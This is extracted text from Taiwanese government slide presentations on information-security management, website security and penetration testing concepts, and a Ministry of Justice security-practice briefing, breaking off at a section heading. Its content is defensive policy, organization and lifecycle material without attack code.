Proxy<br />
ACL<br />
ACL<br />
差 勤 系 統<br />
‧ 民 眾 、 員 工 均 採 SSO<br />
AP 伺 服 器<br />
公 文 系 統<br />
7
5. 實 體 與 環 境 安 全<br />
作<br />
法<br />
集 中 電 腦 機 房 ..<br />
門 禁 管 制<br />
獨 立 電 力<br />
減 震 高 架 地 板<br />
標 準 機 櫃 ..<br />
錄 影 系 統<br />
消 防 系 統<br />
人 機 分 離<br />
6. 通 訊 與 作 業 管 理 1/2<br />
工 作 項 目<br />
簽 章 電 子 交 換<br />
作 1. 電 子 公 文 交 換<br />
法<br />
2. 電 子 聯 合 服 務 中 心<br />
入 侵 防 禦 系 統<br />
標 準 程 序<br />
1. 開 關 機 程 序<br />
2. 異 地 備 援 啟 動<br />
3. 整 合 備 份 程 序<br />
4. 障 礙 排 除 手 冊<br />
5. 緊 急 報 修 程 序<br />
防 毒 監 控 系 統 ..<br />
弱 點 掃 瞄 ( 半 年 一 次 )<br />
8
6. 通 訊 與 作 業 管 理 2/2<br />
作<br />
法<br />
項 目<br />
資 料 備 份<br />
日 誌 備 份<br />
作 業 日 誌<br />
加 密 儲 存 、 異 地 儲 存 、4 代 資 料<br />
Fully+Incremental<br />
回 存 測 試 ( 每 週 )<br />
系 統 日 誌 集 中 備 份 ( 使 用 Tivoli 自<br />
動 收 集 log)<br />
每 月 轉 錄 成 光 碟<br />
內 容<br />
儲 存 於 防 潮 櫃 並 上 鎖<br />
25 種 機 房 作 業 表 單<br />
6.1 防 毒 及 入 侵 偵 測 集 中 監 控<br />
Virus Log<br />
Virus Log<br />
1 級 策 略 中 心<br />
安 控 中 心<br />
Virus Log<br />
Virus Log<br />
Internet<br />
DMZ<br />
SMTP 郵 件<br />
防 毒 伺 服 器<br />
用 戶 端<br />
防 毒 伺 服 器<br />
2 級 策 略 中 心<br />
防 毒 監 控 平 台<br />
SOC 平 台<br />
報 修 平 台<br />
Intranet<br />
Virus Log<br />
安 控 中 心<br />
防 毒 伺 服 器<br />
安 控 中 心<br />
防 毒 伺 服 器<br />
9
作<br />
法<br />
項 目<br />
資 安 納 入 系<br />
統 規 格<br />
電 子 交 換 使<br />
用 憑 証<br />
即 時 修 補 系<br />
統 弱 點<br />
即 時 監 控 系<br />
統 效 能 ..<br />
7. 系 統 開 發 及 維 護<br />
內 容<br />
輸 入 檢 查 ( 防 止 Sql Injection)<br />
後 門 程 式 檢 查 ( 抽 驗 原 始 碼 )<br />
.. 共 通 平 台<br />
電 子 公 文 交 換<br />
電 子 聯 合 服 務 中 心<br />
定 期 檢 視 系 統 日 誌<br />
模 擬 系 統 測 試 無 誤 後 實 施<br />
主 機 效 能 (Tivoli)<br />
資 料 庫 效 能 (BMC Partrol)<br />
發 現 異 常 警 示 告 警<br />
網 路 管 理 ..<br />
7.1 管 理 平 台 示 意 圖<br />
系 統<br />
系 統<br />
系 統 登 入<br />
流 程 作 業<br />
系 統 登 入<br />
流 程 作 業<br />
系<br />
統<br />
登<br />
入<br />
流<br />
程<br />
作<br />
業<br />
資<br />
料<br />
儲<br />
存<br />
報<br />
表<br />
產<br />
出<br />
資 料 儲 存 資 料 儲 存<br />
報 表 產 出 報 表 產 出<br />
現 在<br />
共 同 平 台<br />
未 來<br />
10
作<br />
法<br />
項 目<br />
目 錄 服 務<br />
密 碼 管 制<br />
實 體 隔 離<br />
GSN VPN ..<br />
廠 商 遠 端 連<br />
線 管 制<br />
8. 存 取 控 制<br />
單 一 登 入 、 權 限 管 理<br />
8 碼 以 上 、 英 數 字 加 特 殊 符 號 、6 個 月<br />
更 換<br />
機 密 敏 感 資 料 ( 如 戶 地 政 )<br />
1. 連 線 機 關 ( 外 點 單 位 112 個 、 公 所 29 個 )<br />
2. 提 高 網 路 傳 輸 安 全 性<br />
3. 節 省 通 訊 費 用<br />
內 容<br />
1. 使 用 前 申 請 經 核 准 後 開 放<br />
2. 管 制 通 訊 對 象 IP 及 通 訊 埠<br />
8.1 全 縣 及 附 屬 機 關 納 入 VPN 網 路<br />
11
9. 業 務 永 續 運 作 管 理<br />
作<br />
法<br />
緊 急 通 報 程 序<br />
- 標 準 化<br />
備 份 異 地 儲 存 ..<br />
定 期 演 練<br />
-6 個 月 一 次<br />
- 機 房 災 害 演 練<br />
- 異 地 備 援 演 練<br />
單 一 服 務 窗 口<br />
9.1 異 地 備 援<br />
12
10. 符 合 性<br />
作<br />
法<br />
‧ 軟 體 合 法 版 權<br />
‧ 個 人 資 料 保 護<br />
– 戶 、 地 政 系 統 實 體 隔 離<br />
– 調 閱 個 人 相 關 資 料 須 經 警 察 機 關<br />
錄 案<br />
‧ 機 房 定 期 稽 核<br />
– 週 、 月 、 季 、 年 稽 核<br />
討 論<br />
‧ 集 中 好 ? 分 權 好 ?<br />
‣ 預 算 、 事 權 的 掌 握<br />
‣ 資 源 vs. 職 責<br />
‧ 集 中<br />
‣ 預 算 集 中 : 以 量 制 價 ? 預 算 審 核 爭 取 費 力 ?<br />
‣ 工 作 集 中 : 事 權 、 標 準 統 一 ? 責 任 重 、 影 響 廣 ?<br />
• 心 得<br />
‣ 決 策 整 合 度 vs. 主 管 支 持 度<br />
‣ 黑 貓 vs. 白 貓<br />
13
簡 報 完 畢<br />
恭 請 指 教<br />
14
網 站 安 全 與 滲 透 測 試<br />
主 講 人 : 賴 溪 松<br />
崑 山 科 技 大 學 資 訊 科 技 學 院 院 長<br />
國 立 成 功 大 學 電 機 工 程 學 系 特 聘 教 授<br />
1<br />
Outline<br />
• 網 站 安 全 簡 介<br />
• 網 站 生 命 週 期 與 網 站 安 全 防 護<br />
• 滲 透 測 試 簡 介<br />
• 網 站 安 全 與 滲 透 測 試<br />
• 結 論<br />
2
網 站 安 全 簡 介<br />
• 何 謂 網 站 ?<br />
• 網 頁 應 用 程 式 (web Application, 提 供 應 用 服<br />
務 )<br />
• 伺 服 器 ( 提 供 網 站 服 務 的 軟 體 )<br />
• 網 路 ( 網 路 基 礎 建 設 )<br />
• 何 謂 網 站 安 全 ?<br />
• 持 續 提 供 應 用 服 務<br />
• 避 免 不 當 存 取<br />
3<br />
網 站 常 見 的 威 脅<br />
• 網 頁 被 竄 改<br />
• 影 響 架 站 的 組 織 聲 譽<br />
• 入 侵 主 機<br />
• Web Application Vulnerabilities<br />
• 資 料 被 盜<br />
• 影 響 架 站 的 組 織 聲 譽<br />
• 影 響 架 站 的 組 織 客 戶 隱 私<br />
• SQL injection<br />
• Web Application Vulnerabilities<br />
4
潛 在 的 資 料 外 洩 威 脅<br />
• Search Engine<br />
• Google<br />
• Yahoo<br />
• MSN<br />
• Internal Search Engine<br />
• Web page search engine<br />
• Eg., htdig , google desktop.<br />
利 用 google, 輕 鬆 找 到 密 碼<br />
5<br />
網 頁 應 用 系 統 安 全 防 護<br />
• 縱 深 防 護 的 考 量<br />
• 網 路 安 全 防 護<br />
• 提 供 持 續 性 的 服 務<br />
• 網 路 基 礎 建 設 安 全 (ex: Router, DNS ..etc.,)<br />
• 伺 服 器 安 全 防 護<br />
• 作 業 系 統<br />
• 應 用 程 式 安 全 防 護<br />
• 軟 體 或 套 件 的 安 全<br />
• 應 用 程 式 的 安 全<br />
6
網 頁 應 用 系 統 (N-tier)<br />
應 用 程 式 安 全<br />
網 路 安 全<br />
7<br />
伺 服 器 安 全<br />
Web 安 全<br />
• 不 同 層 級 的 安<br />
全 。 建 構 與 堆<br />
積 出 Web 安 全<br />
性 。<br />
• 任 一 環 節 都 可<br />
能 影 響 其 安 全<br />
性 。<br />
8
網 站 生 命 週 期 進 行 安 全 考 量<br />
9<br />
網 站 設 計 階 段<br />
• 目 的<br />
• 定 義 目 標<br />
• 需 求 分 析<br />
• 功 能<br />
• 安 全<br />
• 設 計 與 實 施<br />
網 站 設 計<br />
階 段<br />
網 站 實 作<br />
階 段<br />
網 站 生 命 週 期<br />
網 站 測 試<br />
階 段<br />
營 運 與 維 護<br />
階 段<br />
• 使 用 哪 種 語 言 ( 實 作 語 言 的 安 全 考 量 )<br />
• 採 用 哪 種 Web 系 統 (Web 軟 體 安 全 考 量 )<br />
關 閉 消 滅<br />
階 段<br />
10
網 站 設 計 階 段 - 安 全 考 量 (1)<br />
• 網 頁 及 web application<br />
• 評 估 使 用 的 網 頁 技 術 技 巧 ,ex:ASP,JSP..etc.,<br />
• 所 採 用 的 web application 具 有 的 安 全 弱 點 分 析 及 改<br />
進 。<br />
• 各 類 模 組 與 連 接 資 料 庫 的 安 全 設 定 準 則 .<br />
• 網 頁 伺 服 器<br />
• 評 估 站 台 主 機 所 使 用 的 應 用 軟 體 之 安 全 性<br />
11<br />
網 站 設 計 階 段 - 安 全 考 量 (2)<br />
• 主 機<br />
• 評 估 站 台 主 機 作 業 系 統 的 安 全 性<br />
• 評 估 站 台 主 機 其 他 應 用 程 式 的 安 全 性<br />
• 網 路<br />
• 對 外 連 線 的 安 全 性<br />
• 頻 寬 是 否 充 足<br />
12
網 站 實 作 階 段<br />
• 應 用 層<br />
• 網 頁 應 用 程 式 發 展 安 全 準 則 。<br />
• 資 料 流 程 安 全 性 準 則 。<br />
• 系 統 層<br />
• 網 站 伺 服 軟 體 安 全 設 定 準 則 。<br />
• 站 台 伺 服 軟 體 修 補 與 更 新 。<br />
• 主 機 層<br />
• 站 台 主 機 安 全 設 定 。<br />
• 站 台 主 機 軟 體 修 補 與 更 新 。<br />
• 網 路 層<br />
• 建 立 連 接 及 備 援 能 力 。<br />
• 建 立 容 錯 機 制 。<br />
13<br />
網 站 測 試 階 段<br />
• 目 的<br />
• 測 試 網 站 的 功 能 性 是 否 符 合 需 求<br />
• 測 試 網 站 的 穩 定 性<br />
• 保 證 程 序 運 作 的 正 確 性<br />
• 連 接 的 正 確 性 ( 資 料 庫 , 網 站 ,Domain name et.,)<br />
• 瀏 覽 正 常<br />
網 站 生 命 週 期<br />
網 站 設 計<br />
階 段<br />
網 站 實 作<br />
階 段<br />
網 站 測 試<br />
階 段<br />
營 運 與 維 護<br />
階 段<br />
關 閉 消 滅<br />
階 段<br />
14
網 站 測 試 階 段 - 安 全 考 量 (1)<br />
• 網 頁 及 web application<br />
• SQL Injection test<br />
• Web Application Security test<br />
• Backup test<br />
• 網 頁 伺 服 器<br />
• Web Server configuration security test<br />
• Web Server application weakness test<br />
15<br />
網 站 測 試 階 段 - 安 全 考 量 (2)<br />
• 主 機<br />
• Host weakness test<br />
• Host configuration Security test<br />
• 網 路<br />
• Connection backup test<br />
• Fault-Tolerance test<br />
• 滲 透 測 試<br />
• 外 部 滲 透 及 安 全 度 測 試<br />
16
什 麼 是 滲 透 測 試 ?<br />
• 經 由 一 連 串 的 活 動 , 進 行 評 估 組 織 資 通<br />
安 全 的 弱 點 。<br />
• 設 計 的 安 全 弱 點 與 漏 洞<br />
• 潛 在 的 安 全 弱 點 與 漏 洞<br />
• 又 稱 為 “ethical hacking” 。<br />
• 滲 透 測 試 者 須 具 有 駭 客 的 技 術 、 高 道 德<br />
標 準 及 富 創 造 力 的 。<br />
17<br />
滲 透 測 試 類 型<br />
• Black Box Penetration Testing<br />
• 測 試 前 不 提 供 組 織 相 關 的 任 何 資 訊<br />
• 模 擬 真 實 世 界 的 駭 客 手 法<br />
• White Box Penetration Testing<br />
• 測 試 前 提 供 重 要 的 組 織 相 關 的 資 訊<br />
• 模 擬 駭 客 已 知 許 多 內 部 的 資 訊 ( 測 試 安 全 政<br />
策 )<br />
• 模 擬 內 部 惡 意 使 用 者<br />
18
測 試 方 法 及 標 準<br />
• OSSTMM(The Open Source Security Testing<br />
Methodology Manual)<br />
• 資 訊 安 全 (Information Security)<br />
• 程 序 安 全 (Process Security)<br />
• 網 路 技 術 安 全 (Internet technology Security)<br />
• 通 訊 安 全 (Communication Security)<br />
• 無 線 安 全 (Wireless Security)<br />
• 實 體 安 全 (Physical Security)<br />
• OWASP(The Open Web Application Security<br />
Project )<br />
• 針 對 網 路 應 用 程 式 安 全 的 開 放 原 始 碼 社 群 專 案<br />
• 發 展 協 助 保 護 網 站 安 全 的 軟 體 工 具 及 相 關 參 考 文 件<br />
19<br />
為 什 麼 需 要 滲 透 測 試 ?<br />
• 定 義 威 脅 組 織 資 訊 資 產 安 全 的 因 素<br />
• 找 出 潛 在 的 安 全 威 脅<br />
• 提 供 資 訊 安 全 評 估<br />
• 幫 助 評 估 面 臨 的 風 險<br />
• 減 少 資 訊 安 全 成 本<br />
• 將 錢 花 在 刀 口 上<br />
• 避 免 事 後 的 處 理 成 本<br />
• 確 保 階 段 性 的 安 全 策 略 或 投 資 成 效<br />
20
由 公 正 第 三 方 進 行 滲 透 測 試<br />
• 資 安 委 外<br />
• 廠 商 負 責 導 入<br />
• 同 時 亦 負 責 檢 測 與 部 分 的 稽 核<br />
• 建 置 與 檢 測 為 同 一 方<br />
• 可 能 不 被 採 信<br />
• 掩 蓋 問 題<br />
• 潛 在 的 安 全 問 題 不 易 測 得<br />
• 由 公 正 第 三 方 進 行<br />
• 非 打 擊 資 安 委 外 廠 商<br />
• 協 助 共 同 提 升 組 織 資 訊 安 全<br />
21<br />
滲 透 測 試 帶 來 的 效 益 !<br />
• 評 估 與 了 解 組 織 面 臨 的 風 險<br />
• 安 全 現 狀<br />
• 潛 在 安 全 弱 點 與 風 險<br />
• 對 於 資 安 成 本 效 益<br />
• 確 認 投 入 的 資 安 成 本 確 實 效 益<br />
• 未 來 的 資 安 投 資 決 策<br />
22
營 運 與 維 護 階 段<br />
• 目 的<br />
• 網 頁 上 線 運 作<br />
• 維 護 網 頁 資 料 更 新<br />
• 持 續 提 供 營 運 與 服 務<br />
23<br />
營 運 與 維 護 階 段 - 安 全 考 量 (1)<br />
• 網 頁 及 web application<br />
• 測 試 可 能 的 安 全 弱 點<br />
• 修 正 可 能 的 安 全 弱 點<br />
• Eg: SQL Injection, new attack…etc.,<br />
• 備 援 機 制<br />
• 網 頁 伺 服 器<br />
• 保 持 應 用 系 統 的 更 新<br />
• 檢 視 與 分 析 日 誌 記 錄<br />
• 備 援 機 制<br />
24
營 運 與 維 護 階 段 - 安 全 考 量 (2)<br />
• 主 機<br />
• 保 持 應 用 系 統 的 更 新<br />
• 檢 視 與 分 析 日 誌 記 錄<br />
• 備 援 機 制<br />
• 網 路<br />
• 其 他 網 路 安 全 設 備 . Ex:Firewall, IDS<br />
• 備 援 機 制<br />
• 持 續 維 護 網 站 運 作 安 全<br />
• 稽 核<br />
• 外 部 的 滲 透 測 試<br />
25<br />
消 滅 關 閉 階 段 - 安 全 考 量 (1)<br />
• 目 的<br />
• 結 束 網 站<br />
• 更 換 新 的 網 頁 應 用 程 式<br />
• 封 存 或 銷 毀 敏 感 性 資 料 與 機 密 資 料<br />
網 站 生 命 週 期<br />
網 站 設 計<br />
階 段<br />
網 站 實 作<br />
階 段<br />
網 站 測 試<br />
階 段<br />
營 運 與 維 護<br />
階 段<br />
關 閉 消 滅<br />
階 段<br />
26
消 滅 關 閉 階 段<br />
• 封 存 或 銷 毀 敏 感 性 資 料 與 機 密 資 料<br />
• 硬 碟 資 料 須 經 消 磁 或 wipe<br />
• 依 特 定 的 處 理 銷 毀 程 序 進 行 之<br />
27<br />
網 站 的 安 全 機 制<br />
• 資 料 的 保 護<br />
• 應 用 系 統 內 的 資 料<br />
• 組 織 內 部 資 料<br />
• 客 戶 敏 感 或 機 密 性 資 料<br />
• 利 用 管 理 來 達 成 每 一 階 段 的 網 站 安 全<br />
• Check List<br />
• 管 理 程 序 與 稽 核 程 序<br />
28
開 發 者 與 系 統 安 全 防 護 者 的 角 色<br />
與 責 任<br />
• 網 頁 應 用 系 統 管 理 者<br />
• 系 統 的 生 命 週 期 管 理<br />
• 網 頁 應 用 系 統 開 發 者<br />
• 開 發 系 統 與 實 作 網 頁 應 用 系 統 的 安 全<br />
• 主 機 系 統 管 理 者<br />
• 維 持 主 機 系 統 的 安 全 及 運 作 正 常<br />
• 網 路 管 理 者<br />
• 維 持 網 路 的 安 全 及 運 作 正 常<br />
29<br />
結 論<br />
• 依 網 站 生 命 週 期 來 看 網 站 在 每 一 時 期 的<br />
安 全 需 求 及 該 如 何 適 當 地 定 義 安 全 的 管<br />
理 程 序 與 實 行 的 方 法 。<br />
• 資 料 與 資 訊 是 網 站 的 重 要 標 的 , 適 當 的<br />
方 法 能 夠 有 效 維 護 這 些 公 開 資 訊 的 安<br />
全 。<br />
• 再 測 試 與 稽 核 是 持 續 維 護 網 站 安 全 的 必<br />
要 條 件 。<br />
30
Q&A<br />
31
資 訊 處<br />
法 務 部 資 安 工 作 經 驗 分 享<br />
報 告 人 : 資 訊 處 處 長 陳 泉 錫<br />
日 期 :95 年 4 月 14 日<br />
1<br />
簡 報 大 綱<br />
資 訊 處<br />
壹 、 法 務 部 業 務 特 性<br />
貳 、 法 務 部 資 訊 管 理 基 本 策 略<br />
參 、 設 備 / 網 路 環 境<br />
肆 、 人 員 安 全 管 理 及 教 育 訓 練<br />
伍 、 資 安 組 織<br />
陸 、 資 產 分 類 與 控 制<br />
柒 、 制 度 / 法 規<br />
捌 、 稽 核<br />
玖 、 檢 討<br />
拾 、 結 語<br />
2
資 訊 處<br />
壹 、 法 務 部 業 務 特 性 ( 一 )<br />
組 織 :<br />
• 法 務 部 本 部 293 人 。<br />
• 檢 察 機 關 28 個 ,4523 人 。<br />
• 矯 正 機 關 49 個 ,6938 人 。<br />
• 行 政 執 行 署 ( 處 )13 個 ,676 人 。<br />
• 調 查 局 / 處 / 組 等 ,2743 人 。<br />
• 政 風 ( 非 直 轄 屬 員 額 ) 約 3000 人 。<br />
• 法 醫 研 究 所 、 司 法 官 訓 練 所 、 矯 正 人 員 訓 練 所 。<br />
• 本 部 所 轄 全 部 機 關 計 94 個 , 總 員 額 ( 不 含 調 查 局 )<br />
12430 人 。<br />
3<br />
資 訊 處<br />
壹 、 法 務 部 業 務 特 性 ( 二 )<br />
所 屬 機 關 資 訊 組 織 設 置 :<br />
• 本 部 : 資 訊 室 (30 人 )<br />
• 檢 察 機 關 : 設 資 訊 室 。<br />
• 矯 正 機 關 : 未 設 , 小 部 分 有 資 訊 人 員 , 餘 由 統<br />
計 人 員 兼 。<br />
• 行 政 執 行 機 關 : 各 執 行 處 未 設 , 統 計 人 員 兼 。<br />
• 資 訊 人 員 合 計 :112 人 。<br />
• 資 訊 人 力 比 :112/12430=0.90%<br />
4
3Com<br />
貳 、 法 務 部 資 訊 管 理 基 本 策 略<br />
資 訊 處<br />
• 中 央 集 權 制<br />
軟 硬 體<br />
網 路<br />
資 安 制 度<br />
• 地 方 機 關<br />
執 行<br />
5<br />
各 地 高 分 檢<br />
最 高 檢<br />
台 高 檢<br />
台 北 地 檢<br />
參 、 設 備 / 網 路 環 境 ( 一 )<br />
法 務 部<br />
光 纖<br />
單 一 窗 口<br />
查 詢 系 統<br />
T3<br />
資 訊 處<br />
Internet<br />
(GSN)<br />
ADSL<br />
2M/512<br />
T3<br />
ADSL<br />
2M/512<br />
北 部 地 區<br />
一 審 檢 察<br />
行 政 執 行<br />
T3<br />
2M 專 線<br />
DNS<br />
Mail<br />
Web<br />
ADSL VPN<br />
骨 幹 網 路<br />
ADSL<br />
2M/512<br />
ADSL<br />
2M/512<br />
ADSL<br />
2M/512<br />
中 部 地 區<br />
一 審 檢 察<br />
行 政 執 行<br />
2M 專 線<br />
2M 專 線<br />
專 線 VPN<br />
骨 幹 網 路<br />
2M 專 線<br />
512K 專 線<br />
各 矯 正 機 關<br />
南 部 地 區<br />
一 審 檢 察<br />
行 政 執 行<br />
調 查 局<br />
更 生 保 護 會<br />
司 法 官 訓 練 所<br />
電<br />
金 門 地 檢<br />
連 江 地 檢<br />
6
資 訊 處<br />
參 、 設 備 / 網 路 環 境 ( 二 )<br />
• 全 國 機 關 建 置 成 單 一 VPN, 使 用 單 一 進 出 閘<br />
門 : 防 火 牆 、 入 侵 偵 測 、 垃 圾 郵 件 過 濾 、 防 毒<br />
牆 。<br />
• 主 動 式 防 毒 機 制 。<br />
• 定 期 弱 點 掃 描 。<br />
• SYSTEM LOG 的 處 理 (OP 第 一 線 、SP 第 二 線 )。<br />
• N-SOC 的 協 助 (DMZ 區 及 內 網 出 口 )。<br />
7<br />
資 訊 處<br />
參 、 設 備 / 網 路 環 境 ( 三 )<br />
• 網 路 示 意 圖 POT<br />
• 納 入 Honey 之 架 構 圖<br />
8
資 訊 處<br />
肆 、 人 員 安 全 管 理 及 教 育 訓 練 ( 一 )<br />
資 訊 系 統 安 全 之 威 脅 :<br />
Threat from Environment : 15%-17%<br />
Threat from People :83%-85%<br />
•Internal People :70%-80%<br />
•External People :3%-15%<br />
Source :Datapro Report 1995<br />
9<br />
肆 、 人 員 安 全 管 理 及 教 育 訓 練 ( 二 )<br />
資 訊 處<br />
在 職 人 員 資 訊 安 全 警 覺 性 教 育<br />
• 每 年 舉 辦 三 至 四 次 資 安 警 覺 性 教 育 , 並 由 人 事<br />
處 協 助 管 制 受 訓 時 數 。<br />
10
資 訊 處<br />
肆 、 人 員 安 全 管 理 及 教 育 訓 練 ( 三 )<br />
新 進 人 員 資 訊 安 全 教 育 訓 練 :<br />
• 由 人 事 處 提 供 本 處 製 作 之 新 進 人 員 資 訊 系 統 簡 介<br />
光 碟 , 協 助 新 進 同 仁 了 解 本 部 所 使 用 之 資 訊 系 統<br />
及 資 訊 安 全 政 策 。<br />
11<br />
資 訊 處<br />
肆 、 人 員 安 全 管 理 及 教 育 訓 練 ( 四 )<br />
12
資 訊 處<br />
肆 、 人 員 安 全 管 理 及 教 育 訓 練 ( 五 )<br />
13<br />
資 訊 處<br />
肆 、 人 員 安 全 管 理 及 教 育 訓 練 ( 六 )<br />
替 代 役 男 資 訊 安 全 教 育 訓 練 :<br />
• 對 於 所 有 分 發 至 本 部 及 所 屬 機 關 之 替 代 役<br />
男 , 於 職 前 為 其 舉 辦 2 小 時 資 訓 安 全 教 育 訓<br />
練 。<br />
14
資 訊 處<br />
肆 、 人 員 安 全 管 理 及 教 育 訓 練 ( 七 )<br />
委 外 人 員 : 與 公 司 之 合 約 , 再 分 個 別<br />
• 法 務 部 電 腦 主 機 房 系 統 操 作 管 理 人 員 (OP) 考 評<br />
制 度<br />
• 保 密 切 結 及 資 安 守 則<br />
• 設 備 攜 入 之 管 控<br />
15<br />
資 訊 處<br />
16
資 訊 處<br />
肆 、 人 員 安 全 管 理 及 教 育 訓 練 ( 八 )<br />
• 訓 練 資 訊 處 人 員<br />
強 化 資 安 攻 防 技 巧 基 本 能 力 PM4:00-7:00<br />
全 部 人 員 共 同 研 討 合 約 及 保 密 切 結 應 訂 定<br />
之 內 容<br />
• 所 屬 機 關 首 長<br />
本 部 統 一 調 訓<br />
• 所 屬 機 關 資 訊 人 員<br />
本 部 統 一 調 訓<br />
17<br />
資 訊 處<br />
伍 、 資 安 組 織 ( 一 )<br />
• 部 本 部<br />
• 「 法 務 部 資 通 安 全 會 報 」<br />
• 為 本 部 資 通 安 全 最 高 督 導 組 織 , 由 次 長 擔 任 召 集 人 、 資 訊 處<br />
處 長 擔 任 執 行 秘 書 、 各 單 位 主 管 擔 任 委 員 , 下 設 :<br />
• 「 法 務 部 資 通 安 全 處 理 小 組 」:<br />
• 由 資 訊 處 處 長 擔 任 召 集 人 , 負 責 推 動 、 協 調 及 督 導 資 訊 安 全<br />
管 理 事 項 , 並 負 責 資 訊 安 全 危 機 事 項 之 通 報 及 應 變 事 宜 , 及<br />
本 會 報 相 關 幕 僚 作 業 。<br />
18
資 訊 處<br />
伍 、 資 安 組 織 ( 二 )<br />
• 法 務 部 資 訊 安 全 稽 核 小 組<br />
• 召 集 人 : 資 訊 處 處 長 , 成 員 : 檢 察 司 、 矯 正 司 、 政 風 司 等 相<br />
關 司 、 處 人 員 及 資 訊 處 各 科 負 責 人<br />
• 所 屬 機 關<br />
• 資 訊 安 全 執 行 小 組<br />
• 召 集 人 : 機 關 副 首 長 , 成 員 : 各 科 室 主 主 管 ,<br />
資 訊 兼 辦 人 員<br />
19<br />
資 訊 處<br />
陸 、 資 產 分 類 與 控 制 ( 一 )<br />
資 訊 資 產 只 要 與 民 眾 之 個 人 資 料 有 關 當 視<br />
為 重 要 資 料 , 皆 須 嚴 格 管 理 。<br />
以 資 訊 回 復 需 求 之 急 迫 性 , 影 響 之 範 圍 大<br />
小 區 分 其 應 變 之 先 後 順 序 及 保 護 之 嚴 謹 程<br />
度 。<br />
以 各 別 應 用 系 統 進 行 風 險 評 鑑 。<br />
20
資 訊 處<br />
21<br />
資 訊 處<br />
陸 、 資 產 分 類 與 控 制 ( 二 )<br />
顏 色 管 理<br />
• 白 色 標 籤 :<br />
第 三 類 一 般 服 務 伺 服 主 機<br />
• 藍 色 標 籤 :<br />
第 二 類 對 內 重 要 服 務 伺 服 主 機<br />
• 黃 色 標 籤 :<br />
第 一 類 對 外 重 要 服 務 伺 服 主 機<br />
保 護 及 回 復 方 式 之 區 隔<br />
• 核 心 資 料 庫 - 刑 案 主 機 ,HOT STANDBY, 異 地 備 份 。<br />
• 重 要 檔 案 -SAN, 異 地 備 份 。<br />
• 次 要 檔 案 - 異 地 備 份 。<br />
22
資 訊 處<br />
柒 、 制 度 / 法 規 ( 一 )<br />
• 國 外 資 安 管 理 法 規 :<br />
US:<br />
• Information Technology Management Reform Act<br />
(ITMRA)(Clinger cohen ACT,1996)<br />
§ 5123 (6),<br />
§ 5125 CIO Function and official<br />
designated<br />
• Federal Information Security Management Act<br />
(FISMA)<br />
23<br />
資 訊 處<br />
柒 、 制 度 / 法 規 ( 二 )<br />
• 國 內 資 安 管 理 法 規<br />
法 律 / 命 令 :<br />
• 直 接 相 關 法 律 - 無<br />
• 間 接 相 關 : 政 府 機 密 保 護 法 、 電 腦 個 人 資 料 保 護 法 、 刑 法 等<br />
行 政 規 則 :<br />
• 行 政 院 及 所 屬 各 機 關 資 訊 安 全 管 理 要 點<br />
• 行 政 院 及 所 屬 各 機 關 資 訊 安 全 管 理 規 範<br />
• 各 機 關 處 理 資 通 安 全 事 件 危 機 通 報 緊 急 應 變 作 業 注 意 事 項<br />
• ․․<br />
法 務 部 資 訊 安 全 行 政 規 則 體 系 表<br />
24
‣ 法 務 部 資 訊 安 全 行 政 規 則 體 系 表<br />
* 行 政 院 及 所 屬 各 機 關 資 訊 安<br />
全 管 理 要 點<br />
* 行 政 院 所 屬 各 機 關 資 訊 安 全<br />
管 理 規 範<br />
* 國 家 資 通 訊 基 礎 建 設 安 全 機<br />
制 計 畫<br />
* 各 機 關 處 理 資 通 安 全 事 件 危<br />
機 通 報 緊 急 應 變 作 業 注 意 事<br />
項<br />
* 各 政 府 機 關 ( 構 ) 落 實 資 安<br />
事 件 危 機 處 理 具 體 執 行 方 案<br />
* 法 務 部 資 通 安 全 會 報<br />
* 法 務 部 及 所 屬 各 機 關 資<br />
訊 安 全 管 理 計 畫<br />
* 法 務 部 及 所 屬 機 關 資 通<br />
安 全 事 件 緊 急 應 變 計 畫<br />
暨 作 業 處 理 程 序<br />
* 法 務 部 資 通 安 全 處<br />
理 小 組<br />
* 法 務 部 所 屬 各 機 關<br />
資 訊 安 全 執 行 小 組<br />
* 法 務 部 資 訊 安 全 稽<br />
核 小 組<br />
* 法 務 部 外 部 稽 核<br />
小 組 ( 任 務 編 組 )<br />
* 法 務 部 內 部 稽 核<br />
小 組 ( 任 務 編 組 )<br />
資 產 分 類 與 控 制<br />
* 法 務 部 暨 所 屬 機 關 資 訊 設 備 登 錄 注 意 事 項<br />
* 政 府 所 屬 各 級 行 政 機 關 電 腦 軟 體 管 理 作 業<br />
要 點<br />
* 法 務 部 資 訊 軟 硬 體 設 備 購 案 驗 收 程 序 注 意<br />
事 項<br />
人 員 安 全<br />
* 法 務 部 及 所 屬 機 關 資 訊 訓 練 作 業 規 範<br />
* 法 務 部 電 腦 主 機 房 系 統 操 作 管 理 人 員 (OP)<br />
考 評 制 度<br />
* 法 務 部 資 訊 處 聘 用 暨 約 僱 人 員 考 核 要 點<br />
* 保 密 切 結 書<br />
* 法 務 部 暨 所 屬 機 關 資 訊 安 全 作 業 基 本 認 知<br />
實 體 與 環 境 安 全<br />
* 法 務 部 電 腦 機 房 管 理 作 業 規 範<br />
* 法 務 部 受 理 廠 商 或 訪 客 進 入 辦 公 場 所 注 意<br />
事 項 ( 草 案 )<br />
通 訊 與 作 業 管 理<br />
* 法 務 部 及 所 屬 機 關 網 路 使 用 管 理 要 點<br />
* 法 務 部 暨 所 屬 機 關 電 子 郵 件 使 用 管 理 規 範<br />
( 草 案 )<br />
* 法 務 部 及 所 屬 機 關 網 站 設 置 作 業 規 範<br />
* 法 務 部 全 球 資 訊 網 資 料 維 護 更 新 注 意 事 項<br />
* 全 國 法 規 電 腦 處 理 作 業 規 範<br />
存 取 控 制<br />
* 法 務 部 所 屬 各 級 檢 察 署 使 用 識 別 碼 及 密 碼<br />
查 詢 部 內 網 路 資 料 作 業 注 意 事 項<br />
* 法 務 部 行 政 執 行 署 暨 所 屬 機 關 使 用 識 別 碼<br />
及 密 碼 查 詢 部 內 網 路 資 料 作 業 注 意 事 項<br />
* 法 務 部 調 查 局 使 用 識 別 碼 及 密 碼 查 詢 部 內<br />
網 路 資 料 作 業 注 意 事 項<br />
* 法 務 部 所 屬 各 監 院 所 校 使 用 識 別 碼 及 密 碼<br />
查 詢 部 內 網 路 資 料 作 業 注 意 事 項<br />
* 法 務 部 所 屬 矯 正 機 關 遠 距 接 見 要 點<br />
* 臺 灣 臺 北 地 方 法 院 檢 察 署 檢 察 官 遠 距 訊 問<br />
試 辦 作 業 要 點<br />
* 法 院 刑 事 遠 距 訊 問 擴 大 作 業 要 點<br />
* 金 融 帳 戶 開 戶 查 詢 系 統 使 用 管 理 要 點<br />
系 統 開 發 及 維 護<br />
